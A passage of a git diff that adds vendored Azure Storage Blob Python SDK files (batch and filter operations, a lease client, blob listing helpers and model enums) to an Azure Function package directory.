"account") # type: str + comp = kwargs.pop('comp', "properties") # type: str + + + request = build_get_account_info_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + template_url=self.get_account_info.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-sku-name']=self._deserialize('str', response.headers.get('x-ms-sku-name')) + response_headers['x-ms-account-kind']=self._deserialize('str', response.headers.get('x-ms-account-kind')) + response_headers['x-ms-is-hns-enabled']=self._deserialize('bool', response.headers.get('x-ms-is-hns-enabled')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + get_account_info.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace + def submit_batch( + self, + content_length, # type: int + body, # type: IO + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> IO + """The Batch operation allows multiple API calls to be embedded into a single HTTP request. + + :param content_length: The length of the request. + :type content_length: long + :param body: Initial data. + :type body: IO + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword multipart_content_type: Required. The value of this header must be multipart/mixed + with a batch boundary. Example header value: multipart/mixed; boundary=batch_:code:``. + :paramtype multipart_content_type: str + :keyword comp: comp. Default value is "batch". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: IO, or the result of cls(response) + :rtype: IO + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[IO] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + multipart_content_type = kwargs.pop('multipart_content_type') # type: str + comp = kwargs.pop('comp', "batch") # type: str + + _content = self._serialize.body(body, 'IO') + + request = build_submit_batch_request( + url=self._config.url, + multipart_content_type=multipart_content_type, + comp=comp, + version=self._config.version, + content=_content, + content_length=content_length, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.submit_batch.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=True, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + deserialized = response.stream_download(self._client._pipeline) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + submit_batch.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace + def filter_blobs( + self, + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + where=None, # type: Optional[str] + marker=None, # type: Optional[str] + maxresults=None, # type: Optional[int] + **kwargs # type: Any + ): + # type: (...) -> "_models.FilterBlobSegment" + """The Filter Blobs operation enables callers to list blobs across all containers whose tags match + a given search expression. Filter blobs searches across all containers within a storage + account but can be scoped within the expression to a single container. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param where: Filters the results to return only to return only blobs whose tags match the + specified expression. Default value is None. + :type where: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation. The operation returns the NextMarker value within the + response body if the listing operation did not return all containers remaining to be listed + with the current page. The NextMarker value can be used as the value for the marker parameter + in a subsequent call to request the next page of list items. The marker value is opaque to the + client. Default value is None. + :type marker: str + :param maxresults: Specifies the maximum number of containers to return. If the request does + not specify maxresults, or specifies a value greater than 5000, the server will return up to + 5000 items. Note that if the listing operation crosses a partition boundary, then the service + will return a continuation token for retrieving the remainder of the results. For this reason, + it is possible that the service will return fewer results than specified by maxresults, or than + the default of 5000. Default value is None. + :type maxresults: int + :keyword comp: comp. Default value is "blobs". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: FilterBlobSegment, or the result of cls(response) + :rtype: ~azure.storage.blob.models.FilterBlobSegment + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.FilterBlobSegment"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "blobs") # type: str + + + request = build_filter_blobs_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + where=where, + marker=marker, + maxresults=maxresults, + template_url=self.filter_blobs.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('FilterBlobSegment', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + filter_blobs.metadata = {'url': "{url}"} # type: ignore + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_lease.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_lease.py new file mode 100644 index 0000000..22b567a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_lease.py @@ -0,0 +1,331 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +import uuid + +from typing import ( # pylint: disable=unused-import + Union, Optional, Any, TypeVar, TYPE_CHECKING +) + +from azure.core.exceptions import HttpResponseError +from azure.core.tracing.decorator import distributed_trace + +from ._shared.response_handlers import return_response_headers, process_storage_error +from ._serialize import get_modify_conditions + +if TYPE_CHECKING: + from datetime import datetime + + BlobClient = TypeVar("BlobClient") + ContainerClient = TypeVar("ContainerClient") + + +class BlobLeaseClient(object): # pylint: disable=client-accepts-api-version-keyword + """Creates a new BlobLeaseClient. + + This client provides lease operations on a BlobClient or ContainerClient. + + :ivar str id: + The ID of the lease currently being maintained. This will be `None` if no + lease has yet been acquired. + :ivar str etag: + The ETag of the lease currently being maintained. This will be `None` if no + lease has yet been acquired or modified. + :ivar ~datetime.datetime last_modified: + The last modified timestamp of the lease currently being maintained. + This will be `None` if no lease has yet been acquired or modified. + + :param client: + The client of the blob or container to lease. + :type client: ~azure.storage.blob.BlobClient or + ~azure.storage.blob.ContainerClient + :param str lease_id: + A string representing the lease ID of an existing lease. This value does not + need to be specified in order to acquire a new lease, or break one. + """ + def __init__( + self, client, lease_id=None + ): # pylint: disable=missing-client-constructor-parameter-credential,missing-client-constructor-parameter-kwargs + # type: (Union[BlobClient, ContainerClient], Optional[str]) -> None + self.id = lease_id or str(uuid.uuid4()) + self.last_modified = None + self.etag = None + if hasattr(client, 'blob_name'): + self._client = client._client.blob # type: ignore # pylint: disable=protected-access + elif hasattr(client, 'container_name'): + self._client = client._client.container # type: ignore # pylint: disable=protected-access + else: + raise TypeError("Lease must use either BlobClient or ContainerClient.") + + def __enter__(self): + return self + + def __exit__(self, *args): + self.release() + + @distributed_trace + def acquire(self, lease_duration=-1, **kwargs): + # type: (int, **Any) -> None + """Requests a new lease. + + If the container does not have an active lease, the Blob service creates a + lease on the container and returns a new lease ID. + + :param int lease_duration: + Specifies the duration of the lease, in seconds, or negative one + (-1) for a lease that never expires. A non-infinite lease can be + between 15 and 60 seconds. A lease duration cannot be changed + using renew or change. Default is -1 (infinite lease). + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + """ + mod_conditions = get_modify_conditions(kwargs) + try: + response = self._client.acquire_lease( + timeout=kwargs.pop('timeout', None), + duration=lease_duration, + proposed_lease_id=self.id, + modified_access_conditions=mod_conditions, + cls=return_response_headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + self.id = response.get('lease_id') # type: str + self.last_modified = response.get('last_modified') # type: datetime + self.etag = response.get('etag') # type: str + + @distributed_trace + def renew(self, **kwargs): + # type: (Any) -> None + """Renews the lease. + + The lease can be renewed if the lease ID specified in the + lease client matches that associated with the container or blob. Note that + the lease may be renewed even if it has expired as long as the container + or blob has not been leased again since the expiration of that lease. When you + renew a lease, the lease duration clock resets. + + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: None + """ + mod_conditions = get_modify_conditions(kwargs) + try: + response = self._client.renew_lease( + lease_id=self.id, + timeout=kwargs.pop('timeout', None), + modified_access_conditions=mod_conditions, + cls=return_response_headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + self.etag = response.get('etag') # type: str + self.id = response.get('lease_id') # type: str + self.last_modified = response.get('last_modified') # type: datetime + + @distributed_trace + def release(self, **kwargs): + # type: (Any) -> None + """Release the lease. + + The lease may be released if the client lease id specified matches + that associated with the container or blob. Releasing the lease allows another client + to immediately acquire the lease for the container or blob as soon as the release is complete. + + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: None + """ + mod_conditions = get_modify_conditions(kwargs) + try: + response = self._client.release_lease( + lease_id=self.id, + timeout=kwargs.pop('timeout', None), + modified_access_conditions=mod_conditions, + cls=return_response_headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + self.etag = response.get('etag') # type: str + self.id = response.get('lease_id') # type: str + self.last_modified = response.get('last_modified') # type: datetime + + @distributed_trace + def change(self, proposed_lease_id, **kwargs): + # type: (str, Any) -> None + """Change the lease ID of an active lease. + + :param str proposed_lease_id: + Proposed lease ID, in a GUID string format. The Blob service returns 400 + (Invalid request) if the proposed lease ID is not in the correct format. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: None + """ + mod_conditions = get_modify_conditions(kwargs) + try: + response = self._client.change_lease( + lease_id=self.id, + proposed_lease_id=proposed_lease_id, + timeout=kwargs.pop('timeout', None), + modified_access_conditions=mod_conditions, + cls=return_response_headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + self.etag = response.get('etag') # type: str + self.id = response.get('lease_id') # type: str + self.last_modified = response.get('last_modified') # type: datetime + + @distributed_trace + def break_lease(self, lease_break_period=None, **kwargs): + # type: (Optional[int], Any) -> int + """Break the lease, if the container or blob has an active lease. + + Once a lease is broken, it cannot be renewed. Any authorized request can break the lease; + the request is not required to specify a matching lease ID. When a lease + is broken, the lease break period is allowed to elapse, during which time + no lease operation except break and release can be performed on the container or blob. + When a lease is successfully broken, the response indicates the interval + in seconds until a new lease can be acquired. + + :param int lease_break_period: + This is the proposed duration of seconds that the lease + should continue before it is broken, between 0 and 60 seconds. This + break period is only used if it is shorter than the time remaining + on the lease. If longer, the time remaining on the lease is used. + A new lease will not be available before the break period has + expired, but the lease may be held for longer than the break + period. If this header does not appear with a break + operation, a fixed-duration lease breaks after the remaining lease + period elapses, and an infinite lease breaks immediately. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: Approximate time remaining in the lease period, in seconds. + :rtype: int + """ + mod_conditions = get_modify_conditions(kwargs) + try: + response = self._client.break_lease( + timeout=kwargs.pop('timeout', None), + break_period=lease_break_period, + modified_access_conditions=mod_conditions, + cls=return_response_headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + return response.get('lease_time') # type: ignore diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_list_blobs_helper.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_list_blobs_helper.py new file mode 100644 index 0000000..e5794fb --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_list_blobs_helper.py @@ -0,0 +1,244 @@ +# pylint: disable=too-many-lines +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +try: + from urllib.parse import unquote +except ImportError: + from urllib import unquote +from azure.core.paging import PageIterator, ItemPaged +from azure.core.exceptions import HttpResponseError +from ._deserialize import get_blob_properties_from_generated_code, parse_tags +from ._generated.models import BlobItemInternal, BlobPrefix as GenBlobPrefix, FilterBlobItem +from ._models import BlobProperties, FilteredBlob +from ._shared.models import DictMixin +from ._shared.response_handlers import return_context_and_deserialized, process_storage_error + + +class BlobPropertiesPaged(PageIterator): + """An Iterable of Blob properties. + + :ivar str service_endpoint: The service URL. + :ivar str prefix: A blob name prefix being used to filter the list. + :ivar str marker: The continuation token of the current page of results. + :ivar int results_per_page: The maximum number of results retrieved per API call. + :ivar str continuation_token: The continuation token to retrieve the next page of results. + :ivar str location_mode: The location mode being used to list results. The available + options include "primary" and "secondary". + :ivar current_page: The current page of listed results. + :vartype current_page: list(~azure.storage.blob.BlobProperties) + :ivar str container: The container that the blobs are listed from. + :ivar str delimiter: A delimiting character used for hierarchy listing. + + :param callable command: Function to retrieve the next page of items. + :param str container: The name of the container. + :param str prefix: Filters the results to return only blobs whose names + begin with the specified prefix. + :param int results_per_page: The maximum number of blobs to retrieve per + call. + :param str continuation_token: An opaque continuation token. + :param str delimiter: + Used to capture blobs whose names begin with the same substring up to + the appearance of the delimiter character. The delimiter may be a single + character or a string. + :param location_mode: Specifies the location the request should be sent to. + This mode only applies for RA-GRS accounts which allow secondary read access. + Options include 'primary' or 'secondary'. + """ + def __init__( + self, command, + container=None, + prefix=None, + results_per_page=None, + continuation_token=None, + delimiter=None, + location_mode=None): + super(BlobPropertiesPaged, self).__init__( + get_next=self._get_next_cb, + extract_data=self._extract_data_cb, + continuation_token=continuation_token or "" + ) + self._command = command + self.service_endpoint = None + self.prefix = prefix + self.marker = None + self.results_per_page = results_per_page + self.container = container + self.delimiter = delimiter + self.current_page = None + self.location_mode = location_mode + + def _get_next_cb(self, continuation_token): + try: + return self._command( + prefix=self.prefix, + marker=continuation_token or None, + maxresults=self.results_per_page, + cls=return_context_and_deserialized, + use_location=self.location_mode) + except HttpResponseError as error: + process_storage_error(error) + + def _extract_data_cb(self, get_next_return): + self.location_mode, self._response = get_next_return + self.service_endpoint = self._response.service_endpoint + self.prefix = self._response.prefix + self.marker = self._response.marker + self.results_per_page = self._response.max_results + self.container = self._response.container_name + self.current_page = [self._build_item(item) for item in self._response.segment.blob_items] + + return self._response.next_marker or None, self.current_page + + def _build_item(self, item): + if isinstance(item, BlobProperties): + return item + if isinstance(item, BlobItemInternal): + blob = get_blob_properties_from_generated_code(item) # pylint: disable=protected-access + blob.container = self.container + return blob + return item + + +class BlobPrefixPaged(BlobPropertiesPaged): + def __init__(self, *args, **kwargs): + super(BlobPrefixPaged, self).__init__(*args, **kwargs) + self.name = self.prefix + + def _extract_data_cb(self, get_next_return): + continuation_token, _ = super(BlobPrefixPaged, self)._extract_data_cb(get_next_return) + self.current_page = self._response.segment.blob_prefixes + self._response.segment.blob_items + self.current_page = [self._build_item(item) for item in self.current_page] + self.delimiter = self._response.delimiter + + return continuation_token, self.current_page + + def _build_item(self, item): + item = super(BlobPrefixPaged, self)._build_item(item) + if isinstance(item, GenBlobPrefix): + if item.name.encoded: + name = unquote(item.name.content) + else: + name = item.name.content + return BlobPrefix( + self._command, + container=self.container, + prefix=name, + results_per_page=self.results_per_page, + location_mode=self.location_mode) + return item + + +class BlobPrefix(ItemPaged, DictMixin): + """An Iterable of Blob properties. + + Returned from walk_blobs when a delimiter is used. + Can be thought of as a virtual blob directory. + + :ivar str name: The prefix, or "directory name" of the blob. + :ivar str service_endpoint: The service URL. + :ivar str prefix: A blob name prefix being used to filter the list. + :ivar str marker: The continuation token of the current page of results. + :ivar int results_per_page: The maximum number of results retrieved per API call. + :ivar str next_marker: The continuation token to retrieve the next page of results. + :ivar str location_mode: The location mode being used to list results. The available + options include "primary" and "secondary". + :ivar current_page: The current page of listed results. + :vartype current_page: list(~azure.storage.blob.BlobProperties) + :ivar str container: The container that the blobs are listed from. + :ivar str delimiter: A delimiting character used for hierarchy listing. + + :param callable command: Function to retrieve the next page of items. + :param str prefix: Filters the results to return only blobs whose names + begin with the specified prefix. + :param int results_per_page: The maximum number of blobs to retrieve per + call. + :param str marker: An opaque continuation token. + :param str delimiter: + Used to capture blobs whose names begin with the same substring up to + the appearance of the delimiter character. The delimiter may be a single + character or a string. + :param location_mode: Specifies the location the request should be sent to. + This mode only applies for RA-GRS accounts which allow secondary read access. + Options include 'primary' or 'secondary'. + """ + def __init__(self, *args, **kwargs): + super(BlobPrefix, self).__init__(*args, page_iterator_class=BlobPrefixPaged, **kwargs) + self.name = kwargs.get('prefix') + self.prefix = kwargs.get('prefix') + self.results_per_page = kwargs.get('results_per_page') + self.container = kwargs.get('container') + self.delimiter = kwargs.get('delimiter') + self.location_mode = kwargs.get('location_mode') + + +class FilteredBlobPaged(PageIterator): + """An Iterable of Blob properties. + + :ivar str service_endpoint: The service URL. + :ivar str prefix: A blob name prefix being used to filter the list. + :ivar str marker: The continuation token of the current page of results. + :ivar int results_per_page: The maximum number of results retrieved per API call. + :ivar str continuation_token: The continuation token to retrieve the next page of results. + :ivar str location_mode: The location mode being used to list results. The available + options include "primary" and "secondary". + :ivar current_page: The current page of listed results. + :vartype current_page: list(~azure.storage.blob.FilteredBlob) + :ivar str container: The container that the blobs are listed from. + + :param callable command: Function to retrieve the next page of items. + :param str container: The name of the container. + :param int results_per_page: The maximum number of blobs to retrieve per + call. + :param str continuation_token: An opaque continuation token. + :param location_mode: Specifies the location the request should be sent to. + This mode only applies for RA-GRS accounts which allow secondary read access. + Options include 'primary' or 'secondary'. + """ + def __init__( + self, command, + container=None, + results_per_page=None, + continuation_token=None, + location_mode=None): + super(FilteredBlobPaged, self).__init__( + get_next=self._get_next_cb, + extract_data=self._extract_data_cb, + continuation_token=continuation_token or "" + ) + self._command = command + self.service_endpoint = None + self.marker = continuation_token + self.results_per_page = results_per_page + self.container = container + self.current_page = None + self.location_mode = location_mode + + def _get_next_cb(self, continuation_token): + try: + return self._command( + marker=continuation_token or None, + maxresults=self.results_per_page, + cls=return_context_and_deserialized, + use_location=self.location_mode) + except HttpResponseError as error: + process_storage_error(error) + + def _extract_data_cb(self, get_next_return): + self.location_mode, self._response = get_next_return + self.service_endpoint = self._response.service_endpoint + self.marker = self._response.next_marker + self.current_page = [self._build_item(item) for item in self._response.blobs] + + return self._response.next_marker or None, self.current_page + + @staticmethod + def _build_item(item): + if isinstance(item, FilterBlobItem): + tags = parse_tags(item.tags) + blob = FilteredBlob(name=item.name, container_name=item.container_name, tags=tags) + return blob + return item diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_models.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_models.py new file mode 100644 index 0000000..d4e46df --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_models.py @@ -0,0 +1,1330 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=too-few-public-methods, too-many-instance-attributes +# pylint: disable=super-init-not-called, too-many-lines + +from enum import Enum + +from azure.core import CaseInsensitiveEnumMeta +from azure.core.paging import PageIterator +from azure.core.exceptions import HttpResponseError + +from ._shared import decode_base64_to_bytes +from ._shared.response_handlers import return_context_and_deserialized, process_storage_error +from ._shared.models import DictMixin, get_enum_value +from ._generated.models import ArrowField +from ._generated.models import Logging as GeneratedLogging +from ._generated.models import Metrics as GeneratedMetrics +from ._generated.models import RetentionPolicy as GeneratedRetentionPolicy +from ._generated.models import StaticWebsite as GeneratedStaticWebsite +from ._generated.models import CorsRule as GeneratedCorsRule +from ._generated.models import AccessPolicy as GenAccessPolicy + + +def parse_page_list(page_list): + """Parse a generated PageList into a single list of PageRange sorted by start. + """ + page_ranges = page_list.page_range + clear_ranges = page_list.clear_range + + ranges = [] + p_i, c_i = 0, 0 + + # Combine page ranges and clear ranges into single list, sorted by start + while p_i < len(page_ranges) and c_i < len(clear_ranges): + p, c = page_ranges[p_i], clear_ranges[c_i] + + if p.start < c.start: + ranges.append( + PageRange(p.start, p.end, cleared=False) + ) + p_i += 1 + else: + ranges.append( + PageRange(c.start, c.end, cleared=True) + ) + c_i += 1 + + # Grab remaining elements in either list + ranges += [PageRange(r.start, r.end, cleared=False) for r in page_ranges[p_i:]] + ranges += [PageRange(r.start, r.end, cleared=True) for r in clear_ranges[c_i:]] + + return ranges + + +class BlobType(str, Enum, metaclass=CaseInsensitiveEnumMeta): + + BLOCKBLOB = "BlockBlob" + PAGEBLOB = "PageBlob" + APPENDBLOB = "AppendBlob" + + +class BlockState(str, Enum, metaclass=CaseInsensitiveEnumMeta): + """Block blob block types.""" + + COMMITTED = 'Committed' #: Committed blocks. + LATEST = 'Latest' #: Latest blocks. + UNCOMMITTED = 'Uncommitted' #: Uncommitted blocks. + + +class StandardBlobTier(str, Enum, metaclass=CaseInsensitiveEnumMeta): + """ + Specifies the blob tier to set the blob to. This is only applicable for + block blobs on standard storage accounts. + """ + + ARCHIVE = 'Archive' #: Archive + COOL = 'Cool' #: Cool + HOT = 'Hot' #: Hot + + +class PremiumPageBlobTier(str, Enum, metaclass=CaseInsensitiveEnumMeta): + """ + Specifies the page blob tier to set the blob to. This is only applicable to page + blobs on premium storage accounts. Please take a look at: + https://docs.microsoft.com/en-us/azure/storage/storage-premium-storage#scalability-and-performance-targets + for detailed information on the corresponding IOPS and throughput per PageBlobTier. + """ + + P4 = 'P4' #: P4 Tier + P6 = 'P6' #: P6 Tier + P10 = 'P10' #: P10 Tier + P20 = 'P20' #: P20 Tier + P30 = 'P30' #: P30 Tier + P40 = 'P40' #: P40 Tier + P50 = 'P50' #: P50 Tier + P60 = 'P60' #: P60 Tier + + +class QuickQueryDialect(str, Enum, metaclass=CaseInsensitiveEnumMeta): + """Specifies the quick query input/output dialect.""" + + DELIMITEDTEXT = 'DelimitedTextDialect' + DELIMITEDJSON = 'DelimitedJsonDialect' + PARQUET = 'ParquetDialect' + + +class SequenceNumberAction(str, Enum, metaclass=CaseInsensitiveEnumMeta): + """Sequence number actions.""" + + INCREMENT = 'increment' + """ + Increments the value of the sequence number by 1. If specifying this option, + do not include the x-ms-blob-sequence-number header. + """ + + MAX = 'max' + """ + Sets the sequence number to be the higher of the value included with the + request and the value currently stored for the blob. + """ + + UPDATE = 'update' + """Sets the sequence number to the value included with the request.""" + + +class PublicAccess(str, Enum, metaclass=CaseInsensitiveEnumMeta): + """ + Specifies whether data in the container may be accessed publicly and the level of access. + """ + + OFF = 'off' + """ + Specifies that there is no public read access for both the container and blobs within the container. + Clients cannot enumerate the containers within the storage account as well as the blobs within the container. + """ + + BLOB = 'blob' + """ + Specifies public read access for blobs. Blob data within this container can be read + via anonymous request, but container data is not available. Clients cannot enumerate + blobs within the container via anonymous request. + """ + + CONTAINER = 'container' + """ + Specifies full public read access for container and blob data. Clients can enumerate + blobs within the container via anonymous request, but cannot enumerate containers + within the storage account. + """ + + +class BlobImmutabilityPolicyMode(str, Enum, metaclass=CaseInsensitiveEnumMeta): + """ + Specifies the immutability policy mode to set on the blob. + "Mutable" can only be returned by service, don't set to "Mutable". + """ + + UNLOCKED = "Unlocked" + LOCKED = "Locked" + MUTABLE = "Mutable" + + +class BlobAnalyticsLogging(GeneratedLogging): + """Azure Analytics Logging settings. + + :keyword str version: + The version of Storage Analytics to configure. The default value is 1.0. + :keyword bool delete: + Indicates whether all delete requests should be logged. The default value is `False`. + :keyword bool read: + Indicates whether all read requests should be logged. The default value is `False`. + :keyword bool write: + Indicates whether all write requests should be logged. The default value is `False`. + :keyword ~azure.storage.blob.RetentionPolicy retention_policy: + Determines how long the associated data should persist. If not specified the retention + policy will be disabled by 